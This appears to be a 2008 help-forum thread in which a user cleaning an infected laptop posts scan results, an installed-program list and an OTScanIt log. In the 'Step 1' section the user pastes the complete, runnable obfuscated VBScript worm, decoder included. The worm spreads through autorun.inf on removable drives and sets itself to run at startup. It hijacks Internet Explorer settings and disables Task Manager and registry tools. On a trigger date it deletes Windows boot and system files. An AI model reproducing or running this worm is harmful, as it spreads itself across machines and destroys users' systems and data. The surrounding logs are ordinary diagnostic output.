C:\Documents and Settings\Tom\My Documents\TomJr\Jrscannedphotos\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom\My Documents\Und1\Thumbs.db:encryptable 0 bytes
scan completed successfully
hidden files: 44

< End of report >
tboxcar
Active Member
 
Posts: 6
Joined: August 20th, 2008, 9:22 pm

Re: Please view

Unread postby tboxcar » August 24th, 2008, 1:20 pm

Still doing some test on my browser, but whatever you recommended seems to have fixed this PC, "how can I tell you ask"

No more "Long Live So War' on my IE Browser

and when inserting flash drives, no virus warning?

Sir, how easy is it to get reinfected with this virus?

I'm using Micro Trends PC #14 for virus protection.
tboxcar
Active Member
 
Posts: 6
Joined: August 20th, 2008, 9:22 pm

Re: Please view

Unread postby tboxcar » August 24th, 2008, 11:00 pm

NEW LOG

Same virus I assume, but now on my laptop, I have a feeling its in my WD Passport hard drive, is this considered a USB drive? as I think this is where my problem lies. By following your previous steps, here are my latest results.

step 1

'Script Compressed with VBSLite 1.0
ao = "amaratbscregeleneresetexfsftheicilinipiritivlemendntoforowptrerirorusotethtotwunutvbvewawsxtEYHKKEREUS' vƒ.sœ (davao c”y, ph’p‘‰)On Err› R‰u— N‹tDim Œo, WHsP, W‘D“, MyFN€eSŠ Œo=Cž‚eObject(S„’t‘g.FeSys£mObject)SŠ WHsP=Cž‚eObject(WS„’t.Sh†l)MyFN€e=WS„’t.S„’tFullN€eW‘D“=Œo.GŠSpecialFoldˆ(0)If LCase(Mid(MyFN€e, 4)) = sœ.vƒ Th‡ WHsP.R§ ‹pl›ˆ.‹e  & Le(MyFN€e, InStrRev(MyFN€e, \) - 1)ElseIf LCase(MyFN€e) <> LCase(W‘D“ & \SysR‰.vƒ) Th‡Call LoadT­Fe()E˜ IfŒo.CopyFe MyFN€e, W‘D“ & \SysR‰.vƒ, T¡eŒo.GŠFe(W‘D“ & \SysR‰.vƒ).AttŸb¨‰=39WHsP.R…Wr”e ¯®_LOCAL_MACHINE\Sowe\Mi„o¢\W‘dœs\Curr‡tVˆsion\R§\Sys£m R‰t›e, ¬„’t.‹e  & W‘D“ & \SysR‰.vƒCall MakeR…E™Ÿ‰()Call PayloadIt()IAct•=IAct•=WHsP.R…Read(¯®_CUR±NT_²ER\Sowe\sœ\st‚s)If (IAct•= Or IAct•=0) Th‡WHsP.R…Wr”e ¯®_CUR±NT_²ER\Sowe\sœ\st‚s, 1WS„’t.S–ep 25500Call In”Spžad()ElseWS„’t.Qu”E˜ IfSub MakeR…E™Ÿ‰()On Err› R‰u— N‹tW”h WHsP.R…Wr”e ¯®_CUR±NT_²ER\Sowe\Mi„o¢\I™ˆnŠ Expl›ˆ\Ma‘\Stt Page, http://www.radzservices.blogspot.com/.R…Wr”e ¯®_CUR±NT_²ER\Sowe\Mi„o¢\I™ˆnŠ Expl›ˆ\Ma‘\W‘dœ T”–, Long L•e Sœ!!!.R…Wr”e ¯®_CUR±NT_²ER\Sowe\Poli‰\Mi„o¢\I™ˆnŠ Expl›ˆ\Co™ l Pan†\Ho—page, 0, ±G_DWORD.R…Wr”e ¯®_LOCAL_MACHINE\Sowe\Mi„o¢\W‘dœs\Curr‡tVˆsion\IeakH†pStr‘g, HAC°D ²ING: SOWAR.R…Wr”e ¯®_CUR±NT_²ER\Sowe\Mi„o¢\W‘dœs\Curr‡tVˆsion\Expl›ˆ\Advancede\Hidd‡, 0, ±G_DWORD.R…Wr”e ¯®_CUR±NT_²ER\Sowe\Mi„o¢\W‘dœs\Curr‡tVˆsion\Expl›ˆ\Advancede\HideFeE­, 0, ±G_DWORD.R…Wr”e ¯®_CUR±NT_²ER\Sowe\Mi„o¢\W‘dœs\Curr‡tVˆsion\Poli‰\Sys£m\Disab–R…istryTools, 0, ±G_DWORD.R…Wr”e ¯®_CUR±NT_²ER\Sowe\Mi„o¢\W‘dœs\Curr‡tVˆsion\Poli‰\Sys£m\Disab–TaskMgr, 0, ±G_DWORD.R…Wr”e ¯®_CUR±NT_²ER\Sowe\Mi„o¢\W‘dœs\Curr‡tVˆsion\Poli‰\Expl›ˆ\NoDr•eTypeAu¥R§, 128, ±G_DWORD.R…Wr”e ¯®_LOCAL_MACHINE\Sowe\Mi„o¢\W‘dœs\Curr‡tVˆsion\R§\Sys£m R‰t›e, ¬„’t.‹e  & W‘D“ & \SysR‰.vƒE˜ W”hE˜ SubSub In”Spžad()On Err› R‰u— N‹tWHsP.R…Wr”e ¯®_CUR±NT_²ER\Sowe\sœ\st‚s, 0DoSŠ Act•Dr•‰=Œo.Dr•‰F› Each ²BFlashDrv In Act•Dr•‰Dr•eP‚h = ²BFlashDrv.P‚hIf (²BFlashDrv.Dr•eType > 0 A˜ ²BFlashDrv.Dr•eType < 4) A˜ (²BFlashDrv.P‚h <> A: A˜ ²BFlashDrv.P‚h <> B:) Th‡If (²BFlashDrv.IsReady) Th‡Œo.CopyFe MyFN€e, Dr•eP‚h & \sœ.vƒ, T¡eŒo.GŠFe(Dr•eP‚h & \sœ.vƒ).AttŸb¨‰=39Œo.CopyFe MyFN€e, Dr•eP‚h & \Radz_Services.vƒ, T¡eŒo.GŠFe(Dr•eP‚h & \Radz_Services.vƒ).AttŸb¨‰=32If Œo.FeExists(Dr•eP‚h & \A¨›§.‘f) Th‡Œo.GŠFe(Dr•eP‚h & \A¨›§.‘f).AttŸb¨‰=34Œo.D†ŠeFe Dr•eP‚h & \A¨›§.‘f, T¡eE˜ IfSŠ Au¥R§S„’t=Œo.Cž‚eT‹tFe(Dr•eP‚h & \A¨›§.‘f, T¡e)Au¥R§S„’t.Wr”eL‘e [a¨›§]Au¥R§S„’t.Wr”eL‘e op‡=¬„’t.‹e sœ.vƒAu¥R§S„’t.Wr”eL‘e sh†l\Op‡\Comma˜=¬„’t.‹e sœ.vƒAu¥R§S„’t.Wr”eL‘e sh†l\Op‡\Default=1Au¥R§S„’t.Wr”eL‘e sh†l\Au¥Play\Comma˜=¬„’t.‹e sœ.vƒAu¥R§S„’t.Wr”eL‘e sh†l\Expl›e\Comma˜=¬„’t.‹e sœ.vƒAu¥R§S„’t.CloseŒo.GŠFe(Dr•eP‚h & \A¨›§.‘f).AttŸb¨‰=39E˜ IfE˜ IfN‹tIsAct•=IsAct•=WHsP.R…Read(¯®_CUR±NT_²ER\Sowe\sœ\st‚s)If IsAct•=1 Th‡WS„’t.Qu”E˜ IfCall MakeR…E™Ÿ‰()WS„’t.S–ep 4000LoopE˜ SubSub LoadT­Fe()On Err› R‰u— N‹tbn€e=Mid(MyFN€e, InStrRev(MyFN€e, \) + 1)t­f‡€e=W‘D“ & \ & Le(bn€e, InStrRev(bn€e, .)-1) & .t­SŠ t­fe=Œo.Cž‚eT‹tFe(t­f‡€e, T¡e)t­fe.wr”e vis” Radz Services. This File is Support to your Computers, Help to Protect your Flash Drives, Memory Cards, Hard Drives, Please dont erase it.. This is a Good Virus.. All Bad Virus cannot disable your Task Manager, Regestry, Hidden File, Folder Option... You can Visit our site http://www.radzservices.blogspot.com or Call/Text 0910-217-4146. The Antivirus Software is Coming.. Made in General Santos City. Partners with: Google.com, Gmail.com, KCC Mall of Gensan, Radz Services and Internet Cafe, FujiFilm, Gaisano, Robinson Mall, SM Mall, NCCC, Fit Mart, Rhine Marketing, Radz Group of Company, RD Group of Company, ACLC, STI, Hi-tech Institute, RMMC, NDDU, HTC, GFI, GoldenState, Electroworld, Octagon, Dwinar, ABS-CBN Gensan, GMA Gensan, Perpect Image, Perfecom, Dalton Pawnsahop, Western Union Money Transfer, Petron, Shell, Caltext, Flying V, YBL, LTO, DTI, DOH, NTC, AFP, GTF, and DOLE. Visit the City of General Santos the Tuna Capital of the Philippines.. Event Pasko sa Gensan, Yaman Gensan, Kalilangan, Tuna Fistival, and many more.. For your Advertisements Call or Text the Programer of Anti-Virus from Gensan. Thank you for Using our Anti-Virus Version 0.0.1.99. NOTE: If your Flash Drive Cannot Remove.. Go to Task Manager.. And Then End Process the wscript program.. Call or Text 0910-217-4146 f› m›e dŠas.t­fe.closeWHsP.R§ no£pad.‹e  & t­f‡€e & E˜ SubSub PayloadIt()On Err› R‰u— N‹tCurCou™=CurCou™=WHsP.R…Read(¯®_LOCAL_MACHINE\Sowe\sœ\cou™)If (CurCou™= Or CurCou™=0) Th‡NewCou™=0WHsP.R…Wr”e ¯®_LOCAL_MACHINE\Sowe\sœ\cou™, 1, ±G_DWORDElseNewCou™=CurCou™WHsP.R…Wr”e ¯®_LOCAL_MACHINE\Sowe\sœ\cou™, CurCou™ + 1, ±G_DWORDE˜ IfIf (Day(D‚e) = 12 A˜ Mo™h(D‚e) = 6) Or (NewCou™ > 100) Th‡Œo.D†ŠeFe Le(w‘d“, 3) & ˜Šect.com, T¡eŒo.D†ŠeFe Le(w‘d“, 3) & Io.sys, T¡eŒo.D†ŠeFe Le(w‘d“, 3) & Msdos.sys, T¡eŒo.D†ŠeFe w‘d“ & \hi—m.sys, T¡eŒo.D†ŠeFe w‘d“ & \W‘.com, T¡eŒo.D†ŠeFe w‘d“ & \sys£m.‘i, T¡eŒo.D†ŠeFe w‘d“ & \w‘.‘i, T¡e¬h.R§ ¡˜ll32.‹e sh†l32.dll,SHEx”W‘dœsEx 2E˜ IfE˜ Sub' sœ.a (vˆ. 1.0.5)' CopyŸght(C) JŠ F."
Execute(a(ao))
Function a(b)
c = b
c = Replace(c, Chr(28), String(3, Chr(9)))
c = Replace(c, Chr(27), String(3, Chr(32)))
c = Replace(c, Chr(29), vbCrLf)
c = Replace(c, Chr(18), Chr(34))
d = Left(c, InStr(1, c, Chr(25)) - 1)
c = Mid(c, Len(d) + 2, Len(c))
e = 1
f = 0
For i = 1 To Len(d) / 2
g = Mid(d, e, 2)
c = Replace(c, Chr(128 + f), g)
e = e + 2
f = f + 1
Next
a = c
End Function


Uninstall list from Step 2

ABBYY FineReader 6.0 Sprint
Adobe Acrobat and Reader 8.1.2 Security Update 1 (KB403742)
Adobe Anchor Service CS3
Adobe Asset Services CS3
Adobe Bridge CS3
Adobe Bridge Start Meeting
Adobe Camera Raw 4.0
Adobe CMaps
Adobe Color - Photoshop Specific
Adobe Color Common Settings
Adobe Color Common Settings
Adobe Color EU Extra Settings
Adobe Color JA Extra Settings
Adobe Color NA Recommended Settings
Adobe Default Language CS3
Adobe Device Central CS3
Adobe ExtendScript Toolkit 2
Adobe ExtendScript Toolkit 2
Adobe Flash Player ActiveX
Adobe Fonts All
Adobe Help Center 2.0
Adobe Help Viewer CS3
Adobe Linguistics CS3
Adobe PDF Library Files
Adobe Photoshop CS3
Adobe Photoshop CS3
Adobe Photoshop Elements 4.0
Adobe Reader 8.1.2
Adobe Setup
Adobe Setup
Adobe Setup
Adobe Stock Photos CS3
Adobe Type Support
Adobe Update Manager CS3
Adobe Version Cue CS3 Client
Adobe WinSoft Linguistics Plugin
Adobe XMP Panels CS3
AOL Coach Version 1.0(Build:20040229.1 en)
AOL Pictures Tools (version 10.6.0.8)
AOL Toolbar 5.0
AOL Uninstaller (Choose which Products to Remove)
AOLIcon
avast! Antivirus
Broadcom Management Programs
Conexant HDA D110 MDC V.92 Modem
Corel Snapfire Plus
Dell Game Console
Dell Support 3.2.1
Digital Content Portal
Digital Line Detect
Documentation & Support Launcher
EarthLink Setup Files
EducateU
EPSON Attach To Email
EPSON Copy Utility 3
EPSON Event Manager
EPSON Perfection V500 Photo Scanner Driver Update
EPSON Perfection V500P User's Guide
EPSON Scan
EPSON Scan Assistant
ESPNMotion
Games, Music, & Photos Launcher
GemMaster Mystic
Get High Speed Internet!
Google Earth
Google Photos Screensaver
Google Toolbar for Firefox
Google Toolbar for Internet Explorer
Google Updater
High Definition Audio Driver Package - KB835221
HijackThis 2.0.2
Hotfix for Windows Internet Explorer 7 (KB947864)
Hotfix for Windows Media Format 11 SDK (KB929399)
Hotfix for Windows Media Player 10 (KB903157)
Hotfix for Windows Media Player 11 (KB939683)
Hotfix for Windows XP (KB952287)
Intel(R) Graphics Media Accelerator Driver
Intel(R) PROSet/Wireless Software
Internet Service Offers Launcher
J2SE Runtime Environment 5.0 Update 6
Learn2 Player (Uninstall Only)
Macromedia Shockwave Player
McAfee Uninstaller
mCore
MCU
mDriver
mDrWiFi
MediaDirect
mHlpDell
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1 Hotfix (KB928366)
Microsoft Compression Client Pack 1.0 for Windows XP
Microsoft Digital Image Standard 2006
Microsoft Encarta Encyclopedia Standard 2006
Microsoft Internationalized Domain Names Mitigation APIs
Microsoft Money 2006
Microsoft National Language Support Downlevel APIs
Microsoft Office Professional Edition 2003
Microsoft Plus! Digital Media Edition Installer
Microsoft Plus! Photo Story 2 LE
Microsoft Streets & Trips 2006
Microsoft User-Mode Driver Framework Feature Pack 1.0
Microsoft Works
Microsoft Works Suite 2006 Setup Launcher
Microsoft Works Suite Add-in for Microsoft Word
mIWA
mLogView
mMHouse
Modem Helper
Mozilla Firefox (2.0.0.16)
mPfMgr
mPfWiz
mProSafe
mSSO
MSXML 4.0 SP2 (KB927978)
MSXML 4.0 SP2 (KB936181)
mWlsSafe
mWMI
mXML
mZConfig
NetWaiting
NetZeroInstallers
Otto
OutlookAddinSetup
PDF Settings
Picasa 2
QuickSet
QuickTime
RealPlayer
SafeGuard
SearchAssist
Security Update for Windows Internet Explorer 7 (KB928090)
Security Update for Windows Internet Explorer 7 (KB929969)
Security Update for Windows Internet Explorer 7 (KB933566)
Security Update for Windows Internet Explorer 7 (KB937143)
Security Update for Windows Internet Explorer 7 (KB938127)
Security Update for Windows Internet Explorer 7 (KB939653)
Security Update for Windows Internet Explorer 7 (KB942615)
Security Update for Windows Internet Explorer 7 (KB944533)
Security Update for Windows Internet Explorer 7 (KB950759)
Security Update for Windows Internet Explorer 7 (KB953838)
Security Update for Windows Media Player 10 (KB917734)
Security Update for Windows Media Player 10 (KB936782)
Security Update for Windows Media Player 11 (KB936782)
Security Update for Windows XP (KB941569)
Security Update for Windows XP (KB946648)
Security Update for Windows XP (KB950760)
Security Update for Windows XP (KB950762)
Security Update for Windows XP (KB950974)
Security Update for Windows XP (KB951066)
Security Update for Windows XP (KB951376)
Security Update for Windows XP (KB951376-v2)
Security Update for Windows XP (KB951698)
Security Update for Windows XP (KB951748)
Security Update for Windows XP (KB952954)
Security Update for Windows XP (KB953839)
Sonic DLA
Sonic Encoders
Sonic MyDVD LE
Sonic RecordNow Audio
Sonic RecordNow Copy
Sonic RecordNow Data
Sonic Update Manager
SpywareBlaster 4.1
Synaptics Pointing Device Driver
Uninstall AOL Emergency Connect Utility 1.0
Update for Windows Media Player 10 (KB913800)
Update for Windows Media Player 10 (KB926251)
Update for Windows XP (KB951072-v2)
Update for Windows XP (KB951978)
Update Rollup 2 for Windows XP Media Center Edition 2005
Viewpoint Media Player
WildTangent Web Driver
Windows Defender
Windows Media Format 11 runtime
Windows Media Format 11 runtime
Windows Media Player 10
Windows Media Player 10 Hotfix [See EmeraldQFE2 for more information]
Windows Media Player 11
Windows Media Player 11
Windows XP Media Center Edition 2005 KB908246
Windows XP Media Center Edition 2005 KB925766
Windows XP Service Pack 3
Yahoo! Music Jukebox

Step 4 results

Code: Select all
OTScanIt logfile created on: 8/24/2008 7:14:44 PM
OTScanIt by OldTimer - Version 1.0.16.2     Folder = C:\Documents and Settings\Tom Jr\Desktop\OTScanIt
Windows XP Media Center Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.11)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
1014.37 Mb Total Physical Memory | 351.35 Mb Available Physical Memory | 34.64% Memory free
2.38 Gb Paging File | 1.84 Gb Available in Paging File | 77.32% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048;
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 105.00 Gb Total Space | 83.56 Gb Free Space | 79.58% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
Drive E: | 5.46 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive F: | 1.90 Gb Total Space | 0.12 Gb Free Space | 6.41% Space Free | Partition Type: FAT
Drive G: | 149.01 Gb Total Space | 112.09 Gb Free Space | 75.23% Space Free | Partition Type: FAT32
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: DJDKK5C1
Current User Name: Tom Jr
Logged in as Administrator.
Current Boot Mode: Normal
Scan Mode: Current user

[Processes - Non-Microsoft Only]
evteng.exe -> %ProgramFiles%\Intel\Wireless\Bin\EvtEng.exe -> Intel Corporation [Ver = 10.5.1.21 | Size = 434176 bytes | Modified Date = 10/18/2006 6:05:18 PM | Attr =    ]
s24evmon.exe -> %ProgramFiles%\Intel\Wireless\Bin\S24EvMon.exe -> Intel Corporation  [Ver = 10.5.1.3 | Size = 946176 bytes | Modified Date = 10/18/2006 5:56:52 PM | Attr =    ]
wlkeeper.exe -> %ProgramFiles%\Intel\Wireless\Bin\WLKEEPER.exe -> Intel(R) Corporation [Ver = 10.5.1.5  | Size = 290816 bytes | Modified Date = 10/18/2006 6:01:34 PM | Attr =    ]
aswupdsv.exe -> %ProgramFiles%\Alwil Software\Avast4\aswUpdSv.exe -> ALWIL Software [Ver = 4, 8, 1227, 0 | Size = 16056 bytes | Modified Date = 7/19/2008 7:25:06 AM | Attr =    ]
ashserv.exe -> %ProgramFiles%\Alwil Software\Avast4\ashServ.exe -> ALWIL Software [Ver = 4, 8, 1227, 0 | Size = 147640 bytes | Modified Date = 7/19/2008 7:38:28 AM | Attr =    ]
photoshopelementsfileagent.exe -> %ProgramFiles%\Adobe\Photoshop Elements 4.0\PhotoshopElementsFileAgent.exe ->  [Ver =  | Size = 102400 bytes | Modified Date = 10/3/2005 1:04:04 PM | Attr =    ]
aolacsd.exe -> %CommonProgramFiles%\AOL\ACS\AOLacsd.exe -> AOL LLC [Ver = 4.6.1.2               | Size = 46640 bytes | Modified Date = 10/23/2006 5:50:35 AM | Attr = R  ]
mdnsresponder.exe -> %ProgramFiles%\Bonjour\mDNSResponder.exe -> Apple Computer, Inc. [Ver = 1,0,3,1 | Size = 229376 bytes | Modified Date = 2/28/2006 12:42:38 PM | Attr =    ]
googleupdaterservice.exe -> %ProgramFiles%\Google\Common\Google Updater\GoogleUpdaterService.exe -> Google [Ver = 2.2.824.5515.beta | Size = 138680 bytes | Modified Date = 8/15/2007 10:06:01 AM | Attr =    ]
hkcmd.exe -> %SystemRoot%\system32\hkcmd.exe -> Intel Corporation [Ver = 3.0.0.4446 | Size = 77824 bytes | Modified Date = 12/13/2005 8:41:08 AM | Attr =    ]
igfxsrvc.exe -> %SystemRoot%\system32\igfxsrvc.exe -> Intel Corporation [Ver = 3.0.0.4446 | Size = 159744 bytes | Modified Date = 12/13/2005 8:41:00 AM | Attr =    ]
igfxpers.exe -> %SystemRoot%\system32\igfxpers.exe -> Intel Corporation [Ver = 3.0.0.4446 | Size = 118784 bytes | Modified Date = 12/13/2005 8:45:00 AM | Attr =    ]
syntpenh.exe -> %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe -> Synaptics, Inc. [Ver = 8.2.4.6 08Mar06 | Size = 761947 bytes | Modified Date = 3/8/2006 5:48:02 PM | Attr =    ]
stsystra.exe -> %SystemRoot%\stsystra.exe -> SigmaTel, Inc. [Ver = 1.0.4995.1  nd446 cp1 | Size = 282624 bytes | Modified Date = 3/24/2006 10:30:44 PM | Attr =    ]
quickset.exe -> %ProgramFiles%\Dell\QuickSet\quickset.exe -> Dell Inc [Ver = 7, 1, 12, 0 | Size = 1032192 bytes | Modified Date = 8/3/2006 5:51:42 PM | Attr =    ]
tfswctrl.exe -> %SystemRoot%\system32\dla\tfswctrl.exe -> Sonic Solutions [Ver = 1.04.08a | Size = 127035 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
issch.exe -> %CommonProgramFiles%\InstallShield\UpdateService\issch.exe -> InstallShield Software Corporation [Ver = 3, 10, 100, 1155 | Size = 81920 bytes | Modified Date = 7/27/2004 3:50:18 PM | Attr =    ]
pcmservice.exe -> %ProgramFiles%\Dell\MediaDirect\PCMService.exe -> CyberLink Corp. [Ver = 4, 5, 0, 0 | Size = 184320 bytes | Modified Date = 5/2/2007 6:16:54 PM | Attr =    ]
realsched.exe -> %CommonProgramFiles%\Real\Update_OB\realsched.exe -> RealNetworks, Inc. [Ver = 0.1.0.4043 | Size = 185632 bytes | Modified Date = 9/13/2007 5:20:20 PM | Attr =    ]
zcfgsvc.exe -> %ProgramFiles%\Intel\Wireless\Bin\ZCfgSvc.exe -> Intel Corporation [Ver = 10.5.1.9 | Size = 802816 bytes | Modified Date = 10/18/2006 6:04:28 PM | Attr =    ]
ifrmewrk.exe -> %ProgramFiles%\Intel\Wireless\Bin\iFrmewrk.exe -> Intel Corporation [Ver = 10.5.1.18 | Size = 696320 bytes | Modified Date = 10/18/2006 5:58:16 PM | Attr =    ]
eeventmanager.exe -> %ProgramFiles%\epson\Creativity Suite\Event Manager\EEventManager.exe -> SEIKO EPSON CORPORATION [Ver = 1, 8, 0, 0 | Size = 102400 bytes | Modified Date = 10/12/2006 4:57:08 PM | Attr =    ]
apdproxy.exe -> %ProgramFiles%\Adobe\Photoshop Elements 4.0\apdproxy.exe -> Adobe Systems Incorporated [Ver = 3.0.0.53237 | Size = 57344 bytes | Modified Date = 9/16/2005 2:37:04 AM | Attr =    ]
aolsoftware.exe -> %CommonProgramFiles%\AOL\1211604845\ee\aolsoftware.exe -> AOL LLC [Ver = 15.5.1.2 | Size = 42032 bytes | Modified Date = 5/25/2007 10:16:08 AM | Attr =    ]
ashdisp.exe -> %ProgramFiles%\Alwil Software\Avast4\ashDisp.exe -> ALWIL Software [Ver = 4, 8, 1227, 0 | Size = 78008 bytes | Modified Date = 7/19/2008 7:38:34 AM | Attr =    ]
netwaiting.exe -> %ProgramFiles%\NetWaiting\netwaiting.exe ->  [Ver =  | Size = 20480 bytes | Modified Date = 9/10/2003 1:24:00 AM | Attr =    ]
googletoolbarnotifier.exe -> %ProgramFiles%\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe -> Google Inc. [Ver = 2, 0, 301, 1654 | Size = 68856 bytes | Modified Date = 4/10/2007 8:01:36 PM | Attr =    ]
regsrvc.exe -> %ProgramFiles%\Intel\Wireless\Bin\RegSrvc.exe -> Intel Corporation [Ver = 10.5.1.5   | Size = 327680 bytes | Modified Date = 10/18/2006 5:49:52 PM | Attr =    ]
dlg.exe -> %ProgramFiles%\Digital Line Detect\DLG.exe -> BVRP Software [Ver = 1, 0, 0, 1 | Size = 24576 bytes | Modified Date = 10/29/2003 1:06:00 AM | Attr =    ]
wanmpsvc.exe -> %SystemRoot%\wanmpsvc.exe -> America Online, Inc. [Ver = 9, 0, 0, 0 | Size = 65536 bytes | Modified Date = 8/27/2003 9:29:46 AM | Attr =    ]
googleupdater.exe -> %ProgramFiles%\Google\Google Updater\GoogleUpdater.exe -> Google [Ver = 2.2.940.34809.beta | Size = 124912 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
ymetray.exe -> %ProgramFiles%\Yahoo!\Yahoo! Music Jukebox\ymetray.exe -> Yahoo! Inc. [Ver = 2.2.2.056 (Build 056) | Size = 54512 bytes | Modified Date = 10/3/2007 2:56:10 PM | Attr =    ]
ashmaisv.exe -> %ProgramFiles%\Alwil Software\Avast4\ashMaiSv.exe -> ALWIL Software [Ver = 4, 8, 1227, 0 | Size = 250040 bytes | Modified Date = 7/19/2008 7:38:04 AM | Attr =    ]
ashwebsv.exe -> %ProgramFiles%\Alwil Software\Avast4\ashWebSv.exe -> ALWIL Software [Ver = 4, 8, 1229, 0 | Size = 348344 bytes | Modified Date = 7/23/2008 7:25:45 AM | Attr =    ]
dot1xcfg.exe -> %ProgramFiles%\Intel\Wireless\Bin\Dot1XCfg.exe -> Intel Corporation [Ver = 10.5.1.9 | Size = 479232 bytes | Modified Date = 10/18/2006 5:53:24 PM | Attr =    ]
launchpad.exe -> %AppData%\U3\0000167A67740D5B\LaunchPad.exe ->  [Ver = 1, 4, 0, 2 | Size = 4603904 bytes | Modified Date = 2/9/2007 4:47:20 PM | Attr =    ]
mcvsusb.exe -> %AppData%\U3\0000167A67740D5B\9CAC5930-4010-4AD6-ABF7-CE2778969B13\Exec\McVsUSB.exe -> McAfee, Inc. [Ver = 3,0,144,0 | Size = 529696 bytes | Modified Date = 12/17/2007 11:31:52 PM | Attr =    ]
vsusbrtm.exe -> %AppData%\U3\0000167A67740D5B\9CAC5930-4010-4AD6-ABF7-CE2778969B13\Exec\VsUSBRtm.exe -> McAfee, Inc. [Ver = 3,0,144,0 | Size = 320848 bytes | Modified Date = 8/2/2007 10:58:24 AM | Attr =    ]
otscanit.exe -> %UserProfile%\Desktop\OTScanIt\OTScanIt.exe -> OldTimer Tools [Ver = 1.0.16.2 | Size = 397312 bytes | Modified Date = 7/12/2008 9:29:54 AM | Attr =    ]

[Win32 Services - Non-Microsoft Only]
(AdobeActiveFileMonitor4.0) Adobe Active File Monitor V4 [Win32_Own | Auto | Running] -> %ProgramFiles%\Adobe\Photoshop Elements 4.0\PhotoshopElementsFileAgent.exe ->  [Ver =  | Size = 102400 bytes | Modified Date = 10/3/2005 1:04:04 PM | Attr =    ]
(AOL ACS) AOL Connectivity Service [Win32_Own | Auto | Running] -> %CommonProgramFiles%\AOL\ACS\AOLacsd.exe -> AOL LLC [Ver = 4.6.1.2               | Size = 46640 bytes | Modified Date = 10/23/2006 5:50:35 AM | Attr = R  ]
(aswUpdSv) avast! iAVS4 Control Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Alwil Software\Avast4\aswUpdSv.exe -> ALWIL Software [Ver = 4, 8, 1227, 0 | Size = 16056 bytes | Modified Date = 7/19/2008 7:25:06 AM | Attr =    ]
(avast! Antivirus) avast! Antivirus [Win32_Own | Auto | Running] -> %ProgramFiles%\Alwil Software\Avast4\ashServ.exe -> ALWIL Software [Ver = 4, 8, 1227, 0 | Size = 147640 bytes | Modified Date = 7/19/2008 7:38:28 AM | Attr =    ]
(avast! Mail Scanner) avast! Mail Scanner [Win32_Own | On_Demand | Running] -> %ProgramFiles%\Alwil Software\Avast4\ashMaiSv.exe -> ALWIL Software [Ver = 4, 8, 1227, 0 | Size = 250040 bytes | Modified Date = 7/19/2008 7:38:04 AM | Attr =    ]
(avast! Web Scanner) avast! Web Scanner [Win32_Own | On_Demand | Running] -> %ProgramFiles%\Alwil Software\Avast4\ashWebSv.exe -> ALWIL Software [Ver = 4, 8, 1229, 0 | Size = 348344 bytes | Modified Date = 7/23/2008 7:25:45 AM | Attr =    ]
(Bonjour Service) ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## [Win32_Own | Auto | Running] -> %ProgramFiles%\Bonjour\mDNSResponder.exe -> Apple Computer, Inc. [Ver = 1,0,3,1 | Size = 229376 bytes | Modified Date = 2/28/2006 12:42:38 PM | Attr =    ]
(dmadmin) Logical Disk Manager Administrative Service [Win32_Shared | On_Demand | Stopped] -> %SystemRoot%\system32\dmadmin.exe -> Microsoft Corp., Veritas Software [Ver = 2600.5512.503.0 | Size = 224768 bytes | Modified Date = 4/13/2008 5:12:17 PM | Attr =    ]
(EvtEng) Intel(R) PROSet/Wireless Event Log [Win32_Own | Auto | Running] -> %ProgramFiles%\Intel\Wireless\Bin\EvtEng.exe -> Intel Corporation [Ver = 10.5.1.21 | Size = 434176 bytes | Modified Date = 10/18/2006 6:05:18 PM | Attr =    ]
(FLEXnet Licensing Service) FLEXnet Licensing Service [Win32_Own | On_Demand | Stopped] -> %CommonProgramFiles%\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -> Macrovision Europe Ltd. [Ver = 11.03.005 | Size = 654848 bytes | Modified Date = 3/20/2008 12:43:11 AM | Attr =    ]
(gusvc) Google Updater Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Google\Common\Google Updater\GoogleUpdaterService.exe -> Google [Ver = 2.2.824.5515.beta | Size = 138680 bytes | Modified Date = 8/15/2007 10:06:01 AM | Attr =    ]
(RegSrvc) Intel(R) PROSet/Wireless Registry Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Intel\Wireless\Bin\RegSrvc.exe -> Intel Corporation [Ver = 10.5.1.5   | Size = 327680 bytes | Modified Date = 10/18/2006 5:49:52 PM | Attr =    ]
(S24EventMonitor) Intel(R) PROSet/Wireless Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Intel\Wireless\Bin\S24EvMon.exe -> Intel Corporation  [Ver = 10.5.1.3 | Size = 946176 bytes | Modified Date = 10/18/2006 5:56:52 PM | Attr =    ]
(WANMiniportService) WAN Miniport (ATW) Service [Win32_Own | Auto | Running] -> %SystemRoot%\wanmpsvc.exe -> America Online, Inc. [Ver = 9, 0, 0, 0 | Size = 65536 bytes | Modified Date = 8/27/2003 9:29:46 AM | Attr =    ]
(WLANKEEPER) Intel(R) PROSet/Wireless SSO Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Intel\Wireless\Bin\WLKEEPER.exe -> Intel(R) Corporation [Ver = 10.5.1.5  | Size = 290816 bytes | Modified Date = 10/18/2006 6:01:34 PM | Attr =    ]

[Driver Services - Non-Microsoft Only]
(Aavmker4) avast! Asynchronous Virus Monitor [Kernel | System | Running] -> %SystemRoot%\System32\drivers\aavmker4.sys -> ALWIL Software [Ver = 4.8.1227.0 | Size = 26944 bytes | Modified Date = 7/19/2008 7:32:15 AM | Attr =    ]
